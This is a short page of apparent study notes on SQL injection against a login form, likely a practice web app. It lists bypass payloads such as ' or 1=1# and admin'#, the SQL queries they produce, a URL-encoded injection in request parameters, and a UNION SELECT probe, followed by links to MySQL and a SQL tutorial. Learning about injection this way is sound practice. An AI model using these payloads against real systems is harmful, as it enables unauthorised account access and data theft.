Professional Documents
Culture Documents
vUser = rafay
vPasswd = 123456 and 1=1
SELECT count(*) FROM accounts WHERE username='rafay' AND password='123456 and 1=1'
SELECT count(*) FROM accounts WHERE username='hassan' AND password='123456 and 1=1'
126' or 1=1#
123456' or 1=2#
123' or 1=1#
or 1=1#';
123456'#
123456 or 1=1#
(2) Test with actual password with (123456' AND 1=1# ) statement.
Statement with wrong password and with (OR) statement with right condition e.g.
SELECT count(*) FROM accounts WHERE username='test' AND password='xyz' or 1=1#'
Injecting code in user name field with correct user name and comment (#) so rest of the statement not executed.
SELECT * FROM accounts WHERE username='admin' #' AND password='1'
Admin'#
osamao
page=user-info.php&username=adnan&password=123456&user-info-php-submit-button=View+Account+Details
page=user-info.php&username=adnan'%23&password=123456&user-info-php-submit-button=View+Account+Details
Select * from accounts where username ='adnan' union select 1,2,3,4,5# and password ='123456'
Additional Resources
MySQL Community Edition
https://dev.mysql.com/downloads/mysql/
SQL Tutorial
https://www.w3schools.com/sql/default.asp